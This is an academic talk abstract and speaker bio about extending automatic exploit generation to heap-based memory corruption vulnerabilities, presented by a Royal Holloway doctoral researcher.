Skip to main content

Automatic Exploit Generation for Heap-based Vulnerabilities

Dusan Repel ( Royal Holloway, University of London )

The automatic exploit generation problem is concerned with the construction of inputs that achieve arbitrary code execution in target applications. The raison d'être is to transition from organic to synthetic exploits by automating the exploit-writing pipeline.

Practical applications include making exploitation accessible to non-expert users, establishing bug severity by proving exploitability, and decreasing the level of human effort required in a time-critical environment.

In this work, we extend the automatic exploit generation paradigm to include heap-based memory corruption vulnerabilities. This involves reasoning about the target application and as well as the underlying dynamic memory allocator. 

Speaker bio

After receiving a BSc in Computer Science, Dusan joined the first generation of PhD research students at the Centre for Doctoral Training in Cyber Security at Royal Holloway, University of London.

He is currently working under the joint supervision of Johannes Kinder and Lorenzo Cavallaro at the Systems Security Lab (S2Lab), where he is investigating methods for automatic exploit generation.

He recently made appearances at various security events, including theFMATS4 workshop on formal methods in Cambridge and the 3rd annual ACE-CSR conference in Solihull. Previously, he participated in Kaspersky academic competitions in Germany and the UK, where he presented work on polymorphic engines.

Share this: